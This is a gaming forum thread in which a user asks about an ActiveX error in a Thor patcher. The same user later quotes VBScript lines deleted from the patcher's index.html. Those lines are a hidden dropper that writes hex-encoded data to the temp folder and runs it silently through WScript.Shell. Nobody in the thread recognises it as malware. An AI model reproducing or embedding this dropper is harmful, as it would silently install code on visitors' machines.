Jump to content
  • 0

Thor patcher error


Erio-chan

Question


  • Group:  Members
  • Topic Count:  35
  • Topics Per Day:  0.01
  • Content Count:  97
  • Reputation:   10
  • Joined:  07/23/16
  • Last Seen:  

activex component can't create object

I can patch anything no prob with that just this error annoy me

always pops up when I open my patcher

post-40676-0-65869900-1470245912_thumb.png

Link to comment
Share on other sites

2 answers to this question

Recommended Posts

  • 0

  • Group:  Members
  • Topic Count:  35
  • Topics Per Day:  0.01
  • Content Count:  97
  • Reputation:   10
  • Joined:  07/23/16
  • Last Seen:  

same here jajajajajaja

Someone know how to solve that? i think its related to Internet Explorer and the notice.html

I have just figure out it my self :meow:

I open the file ( in my case its index.html) that causing the error in c++ note

I deleted 1 by 1 all script line that constantly appearing in the popup error

these are the lines that I have deleted

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

I dunno what is that and what is the function of that script :ani_swt3:

but I tested my Patcher and it works perfectly with no error /heh

I hope someone here would explain us what is that script :meow:

Edited by Erio-chan
Link to comment
Share on other sites

  • 0

  • Group:  Members
  • Topic Count:  10
  • Topics Per Day:  0.00
  • Content Count:  104
  • Reputation:   15
  • Joined:  01/18/16
  • Last Seen:  

same here jajajajajaja

Someone know how to solve that? i think its related to Internet Explorer and the notice.html

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Answer this question...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...